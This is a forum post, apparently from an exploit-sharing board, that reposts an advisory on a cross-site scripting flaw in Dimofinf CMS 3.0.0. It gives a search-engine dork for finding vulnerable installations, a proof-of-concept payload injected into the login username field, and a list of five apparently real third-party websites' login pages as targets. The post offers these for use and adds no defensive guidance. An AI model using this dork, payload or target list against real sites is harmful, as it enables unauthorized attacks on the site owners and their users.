Jump to content
geeko

Dimofinf CMS 3.0.0 Cross Site Scripting

By geeko, in Exploituri

Recommended Posts

geeko Newbie

geeko

Posted
Posted 
	

Dimofinf CMS 3.0.0 Cross Site Scripting
Published
	
Credit
	
Risk
2016.02.18
	
Persian Hack Team
	
Low
CWE
	
CVE
	
Local
	
Remote
CWE-79
	
N/A
	
No
	
Yes
Dork: "Powered by Dimofinf cms Version 3.0.0"



######################
# Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dimofinf.net/index.php
# Google Dork : "Powered by Dimofinf cms Version 3.0.0"
# Date: 2016/02/17
# Version = 3.0.0
######################
# PoC:
# Username: MobhaM" onmouseover=alert("MobhaM") bad="
# Password : 0
#
# http://www.dawadmisms.net/dimcp/login.php
# http://www.aswarzan.com/dimcp/login.php
# http://drhananclinic.com.sa/dimcp/login.php
# http://www.newsqassim.com/dimcp/login.php
# http://www.sudaninet.net/dimcp/login.php
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...